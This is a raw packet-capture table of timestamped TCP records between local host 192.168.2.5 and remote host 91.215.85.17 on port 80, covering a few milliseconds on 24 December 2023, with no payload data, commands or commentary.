Dec 24, 2023 10:44:28.186077118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186111927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186152935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186208010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186255932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186297894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186301947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186359882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186405897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186407089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186474085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186515093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186562061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186587095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186664104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186709881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186712027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186753035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186789036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186889887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186903954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.186948061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.186971903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187025070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187086105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187099934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187143087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187169075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187231064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187277079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187300920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187341928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187385082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187412024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187453985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187491894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187527895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187578917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187621117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187628984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187701941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187717915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187748909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187791109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187834978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.187838078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187943935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.187989950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188002110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188035011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188081026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188122988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188193083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188237906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188267946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188330889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188376904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188411951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188457012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188498020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188524008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188570023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188584089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188612938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188687086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188718081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188724995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188776016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188817978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188823938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188838959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188874960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.188932896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.188986063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189023972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189060926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189096928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189137936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189173937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189263105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189301968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189306974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189363956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189403057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189423084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189446926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189486027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189522982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189629078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189666033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189722061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189815998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189856052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.189860106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189933062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.189974070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190015078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190095901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190136909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190162897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190212965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190249920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190277100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190309048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190350056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190372944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190387011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190423012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190468073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190521002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190558910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190598011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190638065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190676928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190684080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190727949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190764904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190772057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190831900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190864086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.190890074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190959930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.190999985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191025972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191096067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191129923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191137075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191214085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191253901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191253901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191323042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191361904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191375017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191418886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191459894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191472054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191519022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191556931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191629887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191709995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191746950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191771030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191842079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191884995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.191896915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191946983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.191986084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192013979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192056894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192095041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192122936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192148924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192184925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192194939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192245007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192282915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192403078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192459106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192498922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192511082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192579985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192615986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192647934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192682981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192715883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192728043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192786932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192828894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.192833900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192914963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.192954063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193001986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193036079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193073034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193114042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193182945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193218946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193238974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193291903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193330050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193348885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193397999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193432093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193455935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193511009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193551064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193573952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193618059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193655968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193711996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193805933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193844080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193852901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193878889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.193917990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.193974018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194034100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194071054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194108009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194195986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194232941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194257975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194411039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194451094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194459915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194499016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194539070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194567919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194616079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194648981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194654942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194719076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194756985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194767952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194828033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.194865942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.194890976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195022106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195060015 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195147991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195221901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195262909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195276976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195327044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195367098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195379972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195405006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195442915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195487976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195518017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195559025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195575953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195636034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195672035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195672989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195735931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195779085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.195796967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195918083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.195966005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196048021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196115971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196155071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196180105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196233988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196274996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196276903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196358919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196412086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196449041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196494102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196530104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196549892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196621895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196660042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196667910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196698904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196737051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196767092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196795940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196840048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.196866989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196923971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.196965933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197130919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197177887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197227001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197243929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197276115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197320938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197340965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197415113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197462082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197463989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197513103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197555065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197575092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197652102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197699070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197702885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197818995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197833061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197865009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197920084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.197973013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.197981119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198052883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198096991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198132992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198164940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198208094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198232889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198286057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198326111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198450089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198489904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198534966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198556900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198622942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198668003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198668957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198719978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198767900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198776007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198817015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198853970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.198868990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198930025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198947906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.198972940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199027061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199064970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199093103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199234962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199278116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199302912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199352980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199397087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199419975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199485064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199528933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199539900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199609041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199652910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199677944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199768066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.199816942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.199852943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200064898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200110912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.200148106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200232029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200280905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.200535059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200608015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200653076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.200666904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200747013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.200793982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.200819016 CET	80	49716	91.215.85.17	192.168.2.5
